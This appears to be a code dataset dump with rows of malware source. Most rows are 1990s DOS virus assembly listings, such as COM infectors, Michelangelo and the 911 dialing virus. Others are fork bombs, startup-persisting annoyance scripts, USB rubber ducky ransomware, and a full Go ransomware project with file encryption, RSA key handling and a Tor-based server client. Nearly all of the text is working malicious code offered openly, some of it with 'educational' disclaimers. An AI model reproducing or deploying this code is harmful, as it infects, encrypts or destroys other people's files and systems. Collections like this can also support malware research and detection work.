text
stringlengths
0
20k
; Kod rdowy wirusa nieznanego autorstwa. Widoczne s silne wpywy 648. ; Dodano wasne komentarze wskazujce na rnice midzy t wersj i oryginaem. ; Komentarze te poprzedzane s znakami AK:. ; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzenia 1990. comment ; ***************************************************...
;NAME: 512-X.C-M ;FILE SIZE: 00200h - 512d ;START (CS:IP): 00100h ;CODE END: 00300h ;CODE ORIGIN: 00100h ;DATE: Wed Aug 05 13:56:29 1992 CODE SEGMENT BYTE PUBLIC 'CODE' ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING P00100 PROC ORG 0100h H00100: MOV AH,30h ;00100 B4...
; virus from ALT-11 mag ; --------------------------------------- ; ; Coded by: Azagoth ; --------------------------------------- ; Assemble using Turbo Assembler: ; tasm /m2 <filename>.asm ; tlink /t <filename>.obj ; --------------------------------------------------------------------------- ; - Non-Overwriting .C...
code segment assume cs:code,ds:code,es:code,ss:code org 100h main proc near mov dx,offset(nev) ; offset to '*.*' mov ah,4Eh int 21h ; find first mov dx...
PAGE 59,132 ; ; ; 1701-B ; ; Created: 11-Feb-92 ; Passes: 5 Analysis Options on: none ; ; data_31e equ 27D1h ;* data_36e equ 4CD6h ;* data_39e equ 6950h ;* data_45e equ 8848h ;* data_50e e...
;**************************************************************************** ;* Seventh son of a seventh son version 2 ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg FILELEN equ ...
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; ...
>>> Article From Evolution #2 - YAM '92 Article Title: 382 Virus Author: Admiral Bailey ;=--- ; ; 382 Virus (Family-Q as McAfee 91 calls it) ; ; Disassembled By Admiral Bailey [YAM '92] ; June 25, 1992 ; ; The writer of this is unknown to me... maybe you should put some of ; your info in it. ; ; Notes:This virus I f...
;**************************************************************************** ;* Seventh son of a seventh son version 4 ;* ;* Compile with MASM 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* Disclaimer: ;* This file is only for educational purposes. The author takes no ;* responsibil...
;PROGRAM NAME: 512.com ;------------------------------------------------- H00100: MOV AH,30h INT 21h ;DOS Version# MOV SI,0004h MOV DS,SI ;SEGMENT OPERATION CMP Byte Ptr AH,1Eh LDS AX,[SI+08h] JB H0011B ; . . . . ....
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; ...
; Basic little bitty program for people learning about the different modes ; you can stick on your monitor. This program will put you into 80*50 on a ; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested ; it.) Anyways, I tried to comment it so someone not knowing asm would be ; able to under...
; =======================================================================> ; 100% By MnemoniX - 1994 ; ; This is a memory resident .COM infector which hides itself using ; directory stealth (11/12 and 4E/4F). To avoid setting heuristic ; flags in TBAV, it overwrites part of the decryption routine with ; garbage an...
;hmm.,.,.,.,without a name.,.,.,., ;this file is much like the 606, only it ;is much more harmful...it has a special suprise ;for three diffrent dates....hehehehe.,.,,..,., ;i had planned to have it in with the other TR- ;series, but this was much to large to add in with.,., ;enjoy!.... ; nUcLeii ; ...
PAGE 59,132 ; ; ; 1575-E ; ; Created: 23-May-92 ; Passes: 5 Analysis Options on: none ; ; data_1e equ 6 data_2e equ 84h data_3e equ 86h data_4e equ 100h data_10e equ 31Fh data_12e equ 0 ;* d...
;***************************************************************************** ; ; Pixel - 299 virus ; ; Disassembled By Admiral Bailey [YAM '92] ; ; Notes: I dont know where the hell I got this one from but when I found it on ; one of my disks it was named incorectly. Some Amst shit but I looked ; it u...
VSize=085h Code Segment Assume CS:Code org 0 db 4Dh jmp Start Org 600h Bytes db 0CDh,20h,90h,90h Start: mov si, 0100h mov bx, offset Int21 mov ...
title The '405' virus page 65,132 ; ͻ ; British Computer Virus Research Centre ; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ; Telephone: Domestic 0273-26105, International +44-273-26105 ; ...
PAGE 59,132 ; ; ; 1575-E ; ; Created: 23-May-92 ; Passes: 5 Analysis Options on: none ; ; data_1e equ 6 data_2e equ 84h data_3e equ 86h data_4e equ 100h data_10e equ 31Fh data_12e equ 0 ;* d...
From smtp Tue Feb 7 13:13 EST 1995 Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:13 EST Received: by lynx.dac.neu.edu (8.6.9/8.6.9) id NAA30823 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:16:19 -0500 Date: Tue, 7 Feb 1995 13:16:19 -0500 From: lynx.dac.neu.edu!ekilby (Eric Kilby) Content-L...
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; ...
;*************************************************************************** ;* * ;* 196 - Research Virus Version 1.01 Date. 11th April 1992. * ;* * ;* Written ...
PAGE 59,132 ; ; ; 1701-B ; ; Created: 11-Feb-92 ; Passes: 5 Analysis Options on: none ; ; data_31e equ 27D1h ;* data_36e equ 4CD6h ;* data_39e equ 6950h ;* data_45e equ 8848h ;* data_50e e...
; virus from ALT-11 mag ; --------------------------------------- ; ; Coded by: Azagoth ; --------------------------------------- ; Assemble using Turbo Assembler: ; tasm /m2 <filename>.asm ; tlink /t <filename>.obj ; --------------------------------------------------------------------------- ; - Non-Overwriting .C...
; =======================================================================> ; 100% By MnemoniX - 1994 ; ; This is a memory resident .COM infector which hides itself using ; directory stealth (11/12 and 4E/4F). To avoid setting heuristic ; flags in TBAV, it overwrites part of the decryption routine with ; garbage an...
;****************************************************************** ;* * ;* My First Virus, a simple non-overwriting COM infector * ;* * ;* by, Solomon ...
; Basic little bitty program for people learning about the different modes ; you can stick on your monitor. This program will put you into 80*50 on a ; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested ; it.) Anyways, I tried to comment it so someone not knowing asm would be ; able to under...
;*************************************************************************** ;* * ;* 196 - Research Virus Version 1.01 Date. 11th April 1992. * ;* * ;* Written ...
;Smallest in the trivial series of viruses, I think.... ;Last I saw was 30 bytes - this one goes to 29. ;Code by Stormbringer... stupid virus, but small. .model tiny .radix 16 .code org 100 start: FindFile: xchg cx,ax ;ax defaults to zero on runtime - cx doesn't p...
;NAME: 512-X.C-M ;FILE SIZE: 00200h - 512d ;START (CS:IP): 00100h ;CODE END: 00300h ;CODE ORIGIN: 00100h ;DATE: Wed Aug 05 13:56:29 1992 CODE SEGMENT BYTE PUBLIC 'CODE' ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING P00100 PROC ORG 0100h H00100: MOV AH,30h ;00100 B4...
;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS. FILENAME equ 30 ;USED TO FIND FILE NAME FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES FILEDATE equ 24 ;USED TO FIND FILE DATE FILETIME equ 22 ;USED TO FIND...
PAGE 59,132 ; ; ; 1701 ; ; Created: 11-Feb-92 ; Passes: 5 Analysis Options on: none ; ; data_31e equ 27D1h ;* data_36e equ 4CD6h ;* data_39e equ 6950h ;* data_45e equ 8848h ;* data_50e equ...
page 70,120 Name VIRUS ;************************************************************************* ; Program Virus Ver.: 1.1 ; Copyright by R. Burger 1986 ; This is a demonstration program for computer ; viruses. It has the ability to replicate itself, ; and the...
PAGE ,132 S00000 SEGMENT BYTE PUBLIC 'code' ASSUME CS:S00000 ASSUME SS:S00000 ASSUME DS:S00000 H00000 DB 256 DUP(?) P00100 PROC FAR ASSUME ES:S00000 H00100: JMP SHORT H00104 DB 90H H00103 DB 2 H00104: CALL P0010A JMP H006F1 P0010A PROC NEAR H0010A: PUSH CX MOV BX,0138H H0010E: MOV CH,[BX] XOR CH,H00103 MO...
PAGE 59,132 ; ; ; 911 Virus ; ; This program is the 911 Virus. Use at your own risk. When the ; manipulation task begins, it will dial 911 through your modem ; and display "Support Your Police" on the screen. ; ; Assem...
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994 Xref: netcom.com alt.comp.virus:506 Path: netcom.com!ix.netcom.com!netnews From: Zeppelin@ix.netcom.com (Mr. G) Newsgroups: alt.comp.virus Subject: 7th Son Virus Date: 29 Nov 1994 13:02:59 GMT Organization: Netcom Lines: 236 Distribution: world Message-ID: ...
muttiny segment byte public assume cs:muttiny, ds:muttiny org 100h start: db 0e9h, 5, 0 ; jmp startvir restorehere: int 20h idword: dw 990h ; The next line is incredibly pointless. It is a holdover from one ; of the origi...
; Basic little bitty program for people learning about the different modes ; you can stick on your monitor. This program will put you into 80*50 on a ; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested ; it.) Anyways, I tried to comment it so someone not knowing asm would be ; able to under...
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; ...
;405 virus ;disassembled 10th March 1991 by Fred Deakin. ; start: xchg si,ax ;96 }marker bytes ? add [bx+si],al ;00 00 } sahf ;9e } add [bx+si],al ;00 00 } nop ;90 } mov ax,0000h ;clear ax mov byte es:[drive],al ;defa...
PAGE 60,132 ; ; ; 15APR ; ; Created: 4-Mar-91 ; ; data_1e equ 4Ch ; (0000:004C=31h) data_2e equ 4Eh ; (0000:004E=70h) data_3e equ 84h ; (0000:0084=0E3h) data_4e equ 86h ; (0000:0086=161Ah) data_5e e...
# Linux Malware Samples - A Collection of Linux Malware Binaries [![Requests Welcome](https://img.shields.io/badge/requests-welcome-brightgreen.svg?style=round)](https://github.com/MalwareSamples/Linux-Malware-Samples/issues) [![HitCount](http://hits.dwyl.com/MalwareSamples/Linux-Malware-Samples.svg)](http://hits.dwyl...
from datasets import load_dataset ds = load_dataset("json", data_files="code_dataset.json") ds.push_to_hub("walter-taya/code-dataset")
<!-- Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/Mohamed-Awad-31?srid=u2HNX --> <!-- The site contains JavaScript code which generates an infinite string of characters that overwhelms the device's memory. May not work on some browsers. --> <a href="http://...
# CuteVirusCollection #### A Collection of Cute But Deadly Viruses **They will instantly snatch control from you. Then will sicken your high-end PC by overflowing the RAM & overwhelming the processor. And you will see your computer groaning till it crashes. Believe me, viruses were never so lovely before.** Computer ...
<!-- Source: http://jsenabled.blogspot.com/2011/09/9-funniest-javascript-effects.html --> <!-- Opens lots of windows in the browser and crushes the PC. --> <html> <head> <title>Unclosable Window</title> <script> activ = window.setInterval("Farbe()", 100); farbe=1; function Farb...
// Opens an infinite number of command prompt window till the system crushes. Works on Windows OS only. #include <stdlib.h> main(){ while(1){ system("start cmd"); } }
// Simply shuts the system down. // Put the compiled executable in the startup directory // (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup) // of WindowsOS. And be the Devil! // Caution: This will prevent you from turning the PC on. To // solve, you can turn on the PC in safe mode and remove the // executab...
// Randomly moves the window round. Only Ctrl+Alt+Del will work here. #include <windows.h> #include <math.h> DWORD WINAPI moveit(){ HWND a=GetForegroundWindow(); int i,j,k=1; while(k++){ i=200+300*cos(k); j=150+300*sin(k); MoveWindow(a,i,j,i,j,1); Sleep(50); } } main()...
// Developer: Minhas Kamal // Randomly moves the mouse pointer, & clicks different places on the screen. import java.awt.Robot; import java.awt.event.InputEvent; import java.util.Random; public class out_of_control { public static void main(String[] args) throws Exception { Robot robot = new Robot(); Ra...
' Developer: Minhas Kamal ' Shows an unending sequence of annoying messages. ' Put it in the startup directory (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup) ' of WindowsOS and kill your subject with annoyance. DO UNTIL a WScript.Sleep(29999) x=MsgBox("There was a problem detected in your system. Do you w...
:: Source- www.technicalnews.in/smallest-virus-of-the-world-5-characters-can-eat-your-machine :: This batch program recursively executes itself forever and takes up full CPU usage. %0|%0
// A fork-bomb that creates lots of child process till the computer gives up. Works on Unix-like OS. #include <unistd.h> int main(){ while(1) fork(); }
:: Source- http://www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html :: Creates a lot of folders on the disk. Running it for long time may crush hard-disk. :x md %random%%random% goto x
# Source- http://askubuntu.com/questions/159491/why-did-the-command-make-my-system-lag-so-badly-i-had-to-reboot # Creates an infinite number of processes. :(){ :|:& };:
// Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX // Consumes full space of the RAM. main(){ while(malloc(1000)); }
<!-- Intro- Creates a super big string and overwhelms the RAM. --> <!-- Details- http://stackoverflow.com/questions/10965987/how-do-you-force-chrome-pages-tabs-to-crash-using-javascript --> <script> var txt = "a"; while(1){ txt += "a"; } </script>
# Just Crashed Windows! > When you say- "I wrote a program that crashed Windows", people just stare at you blankly and say- "Hey, I got those with the system, **for free**". >> -Linus Torvalds <br /> <div align="right"> <b><i>So cute that the quote alone can crush the system.</i></b> </div>
## Viruses Trojans/Viruses/Worms/Rootkits Source Code Repository ## Worms Section ### lnk virus.txt This is a famous worm that creates shortcut in usb. what was its intention was unknown to most of world, here is a complete source code of it, how elegantly it was designed. - Properties of this worm are - Self Sprea...
[![Licence](https://img.shields.io/github/license/Ileriayo/markdown-badges?style=for-the-badge)](./LICENSE) ### CREDITS - bUILT WITH BYOR Tool - Mauri, Obfuscator, LIFKA, Networkchuck - # <h1 align="center"> KENYATTA Ransomware 🤐 </h1> ![Go](https://img.shields.io/badge/go-%2300ADD8.svg?style=for-the-badge&l...
## Kenyatta Ransomware (USB rubber ducky script) ![Microsoft](https://img.shields.io/badge/Microsoft-0078D4?style=for-the-badge&logo=microsoft&logoColor=white) ![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white) ![Windows 11](https://img.shields.io/badge/Windows%2011...
package cryptofs import ( "bytes" "io/ioutil" "os" "testing" ) func TestEncryptDecrypt(t *testing.T) { key := "us55VKQ3GT7K1YxHwFyO1KS7ULC14ILo" pwd, err := os.Getwd() handleErr(err, t) err = ioutil.WriteFile("original.txt", []byte("Hello World"), 0600) handleErr(err, t) f, err := os.Open("original.txt")...
// Package cryptofs provides a basic abstraction for file encryption/decryption package cryptofs import ( "crypto/aes" "crypto/cipher" "crypto/rand" "io" "os" ) // Type File wrap an os.FileInfo type File struct { os.FileInfo Extension string // The file extension without dot Path string // The absolute p...
# Ransomware [![Build Status](https://travis-ci.org/mauri870/ransomware.svg?branch=master)](https://travis-ci.org/mauri870/ransomware) > Note 1: This project is purely academic, use at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authoriza...
package rsa import ( "crypto/rand" "crypto/rsa" "crypto/sha256" "crypto/x509" "encoding/pem" "fmt" ) // Encrypt content with a public key func Encrypt(publicKey []byte, text []byte) ([]byte, error) { block, _ := pem.Decode(publicKey) pubkeyInterface, err := x509.ParsePKIXPublicKey(block.Bytes) pubkey, _ := p...
package rsa import ( "strconv" "testing" ) var ( PRIV_KEY = []byte(` -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEAxa7DJ2kw+JOICpeJ7lDMksQ1ZIVxb4npjskM6TyP5pAgN5Cd x7WcCVa0bHoVgnRI7WTZmVBLA9QssqAJHav6kroo/0X7dibhghG1mUujgPxq//j4 pPvq0qIMBeQbOB3sryLB/1ScgQzByJBuEBgmFHWfLq7LJUyKmZd1uzKAEtJsrY3f 7WhcWfiqMemMeJl7zvM...
package utils import ( "fmt" "io" "os" ) // DownloadProgressReader wraps an existing io.Reader and show the copy progress // // It simply forwards the Read() call, while displaying // the results from individual calls to it. type DownloadProgressReader struct { io.Reader Total int64 // Total # of bytes transf...
package utils import ( "os/user" "regexp" "testing" ) func TestGenerateANString(t *testing.T) { sizes := []int{8, 16, 32, 64} for _, size := range sizes { key, err := GenerateRandomANString(size) if err != nil { t.Error(err) } if len(key) != size { t.Errorf("Expect key with %d length, but got %d",...
package utils import ( "crypto/rand" "encoding/hex" "io" "os" "os/user" "strings" ) // Generate a random alphanumeric string with the given size func GenerateRandomANString(size int) (string, error) { key := make([]byte, size) _, err := rand.Read(key) if err != nil { return "", err } return hex.EncodeTo...
package web import ( "net/http" "strings" "github.com/labstack/echo" ) var ( ApiResponseForbidden = SimpleResponse{Status: http.StatusForbidden, Message: "Seems like you are not welcome here... Bye"} ApiResponseBadJson = SimpleResponse{Status: http.StatusBadRequest, Message: "Expect valid json p...
package web import ( "encoding/json" "fmt" "net/http" "github.com/labstack/echo" "github.com/mauri870/ransomware/repository" ) type Engine struct { *echo.Echo PrivateKey []byte Database *repository.BoltDB } // NewEngine return a new echo.Echo instance func NewEngine() *Engine { return &Engine{ Echo: ...
package web import ( "net/http" "github.com/labstack/echo" "github.com/mauri870/ransomware/rsa" ) // DecryptPayloadMiddleware try to decrypt the payload from request func (e *Engine) DecryptPayloadMiddleware(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { // Retrieve the payload f...
// +build windows // +build go1.8 package main import ( "encoding/base64" "encoding/json" "fmt" "io/ioutil" "log" "os" "path/filepath" "strings" "sync" "time" "github.com/mauri870/ransomware/client" "github.com/mauri870/ransomware/cmd" "github.com/mauri870/ransomware/cryptofs" "github.com/mauri870/rans...
// +build windows // +build go1.8 package main import ( "encoding/base64" "fmt" "os" "path/filepath" "strings" "github.com/mauri870/ransomware/cmd" "github.com/mauri870/ransomware/cryptofs" "github.com/mauri870/ransomware/utils" ) func init() { // Fun ASCII cmd.PrintBanner() // Execution locked for wind...
package main import ( "flag" "fmt" "log" "io/ioutil" "github.com/labstack/echo/engine" "github.com/labstack/echo/engine/standard" "github.com/labstack/echo/middleware" "github.com/mauri870/ransomware/repository" "github.com/mauri870/ransomware/web" ) var ( // BoltDB database to store the keys // Will be ...
package cmd import ( "fmt" "log" "os" "runtime" "sync" "github.com/mauri870/ransomware/cryptofs" "github.com/mauri870/ransomware/utils" ) var ( UserDir = fmt.Sprintf("%s\\", utils.GetCurrentUser().HomeDir) // Temp Dir TempDir = fmt.Sprintf("%s\\", os.Getenv("TEMP")) // Directories to walk searching for ...
package cmd import ( "os" "github.com/fatih/color" ) var ( banner = ` __________ \______ \_____ ____ __________ ______ _ _______ _______ ____ | _/\__ \ / \ / ___/ _ \ / \ \/ \/ /\__ \\_ __ \_/ __ \ | | \ / __ \| | \\___ ( <_...
package client import ( "fmt" "io" "net/http" "net/url" "strings" "github.com/mauri870/ransomware/rsa" "golang.org/x/net/proxy" ) const ( TOR_PROXY_URL = "127.0.0.1:9050" ) // Client wraps a http client type Client struct { ServerBaseURL string PublicKey []byte HTTPClient *http.Client } // New re...
package repository import ( "errors" "log" "github.com/boltdb/bolt" ) var ( ErrorBucketNotExists = errors.New("Bucket Not Exists") ) type BoltDB struct { *bolt.DB } // Open or create a BoltDB database func Open(name string) *BoltDB { db, err := bolt.Open(name, 0600, nil) if err != nil { log.Fatalln(err) ...
package repository import ( "fmt" "os" "testing" ) func TestRepositoryOpen(t *testing.T) { db := Open("test.db") defer db.Close() defer os.Remove("test.db") if fmt.Sprintf("%T", db) != "*repository.BoltDB" { t.Errorf("Expect *repository.BoltDB but got %T\n", db) } } func TestRepositoryCreateOrUpdate(t *te...
#!/bin/bash set -e # Build the image echo "Building the image..." if docker history -q ransomware >/dev/null 2>&1; then read -r -p "The image already exists. The project volume mounted can be older. Build it again? [y/N] " response case "${response}" in [yY]|[yY][eE][sS]) docker build -t r...
-----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAn+zct953M4exvgKS4G36 xCa5wZfB9F9Ai58SP/UGDoN1chLLYt9wMjJ/B1KVLKCiiKknmCrJ47vzq931lDfb 1nSfvbCP3wyZScKTncdsZqfMjvz8+iC9oe7zev05KXRzXpLH99xbRHqzMX+W+aK+ Z+UFgwHs8IqzruL1d9JeOn6HGq4AHYFwyel4DuYG5OF+SfRmEF2iEWh1Iqo0L3Jn 7l0XSLOL1KGgnKST0kpfKOhZ0UIuXn35g...
-----BEGIN RSA PRIVATE KEY----- MIIJKAIBAAKCAgEAn+zct953M4exvgKS4G36xCa5wZfB9F9Ai58SP/UGDoN1chLL Yt9wMjJ/B1KVLKCiiKknmCrJ47vzq931lDfb1nSfvbCP3wyZScKTncdsZqfMjvz8 +iC9oe7zev05KXRzXpLH99xbRHqzMX+W+aK+Z+UFgwHs8IqzruL1d9JeOn6HGq4A HYFwyel4DuYG5OF+SfRmEF2iEWh1Iqo0L3Jn7l0XSLOL1KGgnKST0kpfKOhZ0UIu Xn35gNuiVAvpwZFPdgw6yNqkt75W...
// +build windows // // Package tor provides a wrapper around the tor proxy command package tor import ( "archive/zip" "bufio" "bytes" "fmt" "io" "net/http" "os" "os/exec" "path/filepath" "strings" "syscall" "github.com/mauri870/ransomware/utils" ) const ( // IsReadyMessage indicates that tor is ready f...
## Startup encryptor ![Microsoft](https://img.shields.io/badge/Microsoft-0078D4?style=for-the-badge&logo=microsoft&logoColor=white)![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)![Windows XP](https://img.shields.io/badge/Windows%20xp-003399?style=for-the-badge&lo...
# Viruses Viruses are nowadays just a continual annoyance but back when thing were shiny and new there was some "Cred" to making a real virus. This repository contains the source code to several hundred viruses from the twentieth century. Main of these have been regenerated from the binaries, but some, incuding some ...
L0100: JMP L08D0 MOV AH,09H MOV DX,010CH INT 21H L010A: INT 20H L010C: DB 'Murphy virus V1.00 (V1277)$' DB 1961 DUP (1) L08D0: JMP L0C51 NOP ; \ NOP ; \ NOP ; \ L08D6: MOV AH,09H ; \ MOV DX,010CH ; > ORIGINAL 24 BYTES INT 21H ; / L08DD: INT 20H ; / ; / L08DF: DB 'Mu...
;****************************************************************************** ;****************************************************************************** ;**** Virus: .COM /noTBAV **** ;**** By: Ramthes Jones **** ;****************************************************************************** ...
;**************************************************************************** ;* The Mutating Interrupt Virus -Soltan Griss- ;* [RABID] -=+ Front 242 +=- ;* ;* ;* Well this is my Third Release of many to come. This virus uses the latest ;* of RABI...
; ;Happy Birthday Robbie Virus ; code segment 'CODE' assume cs:code,ds:code,es:code,ss:code org 0100h code_length equ finish - start lf equ 0Ah cr equ 0Dh start label near id_bytes proc near mov si,si ...
.model tiny .code org 100h start: ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=; ; A NEW ORDER OF INTELLIGENCE PRESENTS: ; ; My Little Pony 1.00 ; ; Copyright (c) 1992...
TITLE MICHELANGELO, a STONED - derived Boot Virus SUBTTL reverse engineered source code for MASM 5.1/6.0 PAGE 60,132 .RADIX 16 IF1 %Out VIRAL SOFTWARE, DO NOT DISTRIBUTE WITHOUT NOTIFICATION ͻ %Out %Out Ŀ %Out Ĵ M I C H E L A N ...
;**************************************************************************** ;* Mini non-resident virus ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg .RADIX 16 FILELEN ...
page ,132 ; ; name: mg-3.vom ; ; program type: com/bin ; ; cpu type: 8086 ; ; program loaded at 0000:01f8 ; ; physical eof at 0000:03f5 ; ; program entry point at 0000:01f8 ; fun segment assume cs:fun,ds:fun,es:fun,ss:fun ; ; references before the start of code space ; org 0006h h_0006 label word org 004ch h_...
Virus relationship charts of Masud Khafir's viruses =================================================== Gotcha F (732) Gotcha E (607) Gotcha A (879) Gotcha B (881) Gotcha C (906) Gotcha D (627) Pogue ...
;virus date 12/31/93 ;disassembly of 1 version of the MICHElANGLO VIRUS ;michelangelo with a loader that will put the virus ;on a disk in drive b: will work correctly on 360 or 1.2meg disks ;loads orginal boot at last sector on those type of disks ;warning if computer date ...
; ========================================================================> ; MutaGenic Agent ][ - MutaGen V1.3 Test Virus ; by MnemoniX 1994 ; ; A simple resident .COM infector implementing MutaGen. ; To assemble: ; TASM mg2 ; TLINK /t mg2 mutagen ; =====================================================...
; Virusname : Metallic Moonlite ; Virusauthor: Metal Militia ; Virusgroup : Immortal Riot ; Origin : Sweden ; ; It's a non-resident, current dir infector of com-files. every first ; of any month it will put a bit of code resident to make ctrl-alt-del's ; to coldboots and delete all files being executed. It's encry...
; McWhale.asm : [McAfee' Whale] by [pAgE] ; Created wik the Phalcon/Skism Mass-Produced Code Generator ; from the configuration file skeleton.cfg ; ; Here's another "lame dick" virus! I thought it was rather fitting! ; Many thanks to the fellows at Phalcon/Skism for this little tool. ; I am sure that Dark Angel and the...
; MERDE-3: A resident, non-overwriting .Com infector by the loki-nator ;Well, here it is, for what it's worth.. It is really kind of a ;piece of crap, but it is just a rough draft.. ;NOTES: ; If this gets into Command.Com, it (command) won't work for unknown reasons.. ; I could have fixed it by just checking to...